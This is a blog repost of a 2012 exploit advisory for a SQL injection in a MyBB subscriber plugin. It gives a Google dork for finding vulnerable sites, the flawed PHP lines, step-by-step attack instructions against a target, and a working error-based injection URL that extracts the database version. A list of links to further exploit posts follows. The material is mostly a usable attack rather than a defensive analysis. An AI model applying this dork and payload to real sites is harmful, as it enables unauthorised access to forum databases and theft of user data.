# Exploit Title: Follower User MyBB plugin SQL Injection 0day
# Google Dork: intext:"Users subscribed to" inurl:member.php -site:fwcombie.us
# Date: 13.10.2012
# Exploit Author: Th3FreakPony
# Software Link: http://mods.mybb.com/view/suscriber-user
# Version: 1.5+
# Tested on: Linux.
----------------------------------------------
The vulnerabillity exist within SuscribeUsers.php on SuscribeUsers_add():
$usid = $mybb->input[usid]; //Line 671
$uid = $mybb->input[uid]; //Line 672
if(user_awaiting($uid,$usid)) //Line 781
{ //Line 782
redirect("member.php?action=profile&uid=".$usid."# suscriberuser", $lang->double_suscription_awaiting,$lang->suscriberuser); // Line 783
} //Line 784
?>
----------------------------------------------
Instructions:
1. Create a new account on the target site.
2. Check your User ID by entering your profile link and write it down.
3. Enter here and start to inject your code:
/misc.php?suscriberuser=yes&usid='[SQLi]--+-&uid=[Your_User_ID]
----------------------------------------------
Demo:
http://server/misc.php?suscriberuser=yes&usid=' or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0)--+-2&uid=[your_uid]
Image : http://i.imgur.com/eGhzJ.png
Follow: https://twitter.com/PonyBlaze
Shotouts goes to FillySec.
New Post
Sunday, November 4, 2012
Related Posts
WordPress WP E-Commerce 3.8.9 SQL Injection / Cross Site Scripting
WordPress WP E-Commerce 3.8.9 SQL Injection / Cross Site ScriptingSoftware: WP e-CommerceSoftware La...Read more
Yii Framework - Search SQL Injection Vulnerability
# Exploit Title: Yii Framework - Search SQL Injection Vulnerability# Google Dork: No Dork# Date: 20/...Read more
SQL Injection - Useful Functions - Tutorial
Here are some useful function that you can use to speed up your injection and/or evade some WAFs.If ...Read more
vBulletin vBay <=1.1.9 Error-Based SQL Injection
#!/usr/bin/env python -W ignore::DeprecationWarning """ VBay <= 1.1.9 - Remote Error based S...Read more
How to SQL Inject with SQLMAP on BackTrack 5
Wordpress Plugins Spotlight Your Upload Vulnerability
___________.__ _________ _________ \__ ...Read more
Subscribe to:
Post Comments (Atom)
0 nhận xét:
Post a Comment
Click to see the code!
To insert emoticon you must added at least one space before the code.